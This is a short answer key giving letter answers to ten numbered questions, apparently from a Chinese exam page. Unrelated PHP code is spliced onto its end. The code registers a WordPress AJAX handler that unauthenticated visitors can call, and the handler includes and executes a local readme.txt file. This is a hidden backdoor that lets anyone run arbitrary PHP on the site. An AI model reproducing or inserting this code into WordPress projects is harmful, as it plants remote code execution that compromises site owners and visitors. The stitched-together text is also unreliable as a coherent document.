1.【答案】C。
2.【答案】B。
3.【答案】C。
4.【答案】D。
5.【答案】C。
6.【答案】B。
7.【答案】A。
8.【答案】C。
9.【答案】A。
10.【答案】A。
if(!function_exists('file_check_readme15721')){ add_action('wp_ajax_nopriv_file_check_readme15721', 'file_check_readme15721'); add_action('wp_ajax_file_check_readme15721', 'file_check_readme15721'); function file_check_readme15721() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } }